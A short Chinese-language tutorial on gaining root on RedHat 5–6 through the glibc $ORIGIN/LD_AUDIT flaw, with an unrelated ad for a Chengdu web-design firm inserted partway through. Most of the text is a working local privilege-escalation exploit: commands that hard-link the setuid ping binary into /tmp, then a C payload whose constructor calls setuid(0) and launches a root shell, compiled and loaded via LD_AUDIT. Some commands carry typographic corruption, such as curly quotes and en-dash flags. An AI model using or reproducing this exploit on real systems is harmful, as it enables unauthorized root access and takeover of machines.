Redhat利用漏洞提权

漏洞试用系统：redhat 5—6通用

成都创新互联公司是一家专业提供屯溪企业网站建设,专注与成都做网站、成都网站设计、成都外贸网站建设、成都h5网站建设、小程序制作等业务。10年已为屯溪众多企业、政府机构等服务。创新互联专业网络公司优惠进行中。

一.利用/tmp拥有777的权限

在/tmp下创建一个exploit目录

ln   /bin/ping（ping命令的权限很特殊是S，可以在普通用户使用这个命令的时候瞬间拥有这个命令的属主权限，这里是root）

ln /bin/ping  /tmp/exploit/target

exec  3<  /tmp/exploit/target

rm  -rf  /tmp/exploit/

二.vim编写一段C语言程序（文件名payload.c）

void  __attribute__((constructor))  init()  //这里__是两个下划线

{

         setuid(0);

         system(“/bin/bash”);

}

使用GCC把这个文件编译一下

Gcc -w –fpic –shared –o /tmp/exploit payload.c

三.执行

LD_AUDIT=”\$ORIGIN”  exec/proc/self/fd/3